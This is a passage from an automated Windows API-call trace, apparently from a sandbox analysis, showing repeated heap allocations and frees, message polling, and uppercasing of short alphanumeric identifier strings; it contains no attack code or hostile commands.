RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab188 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0214.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0214.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0214.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0214.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0214.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0214.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0214.069] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0214.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0214.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0214.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0214.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0214.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0214.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0214.069] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0214.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0214.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0214.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0214.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0214.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0214.069] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0214.069] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0214.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0214.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0214.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0214.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0214.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0214.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0214.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0214.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0214.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0214.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0214.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0214.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0214.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0214.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0214.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0214.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0214.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0214.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0214.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0214.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0214.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0214.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0214.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.073] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0214.073] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0214.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0214.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab338 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0214.073] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0214.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0214.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0214.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0214.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0214.074] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0214.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0214.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0214.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0214.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0214.074] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0214.074] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0214.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0214.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0214.074] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0214.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab170 [0214.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854788 [0214.074] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0214.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0214.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0214.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0214.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0214.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0214.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0214.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0214.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0214.075] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0214.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0214.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0214.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0214.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0214.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0214.075] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0214.075] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0214.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0214.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0214.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0214.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0214.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854788 | out: hHeap=0x2af0000) returned 1 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0214.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0214.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0214.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0214.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0214.076] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0214.076] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0214.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0214.077] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0214.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0214.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab170 [0214.077] RtlAllocateHeap (HeapHandle=0x2af0000, 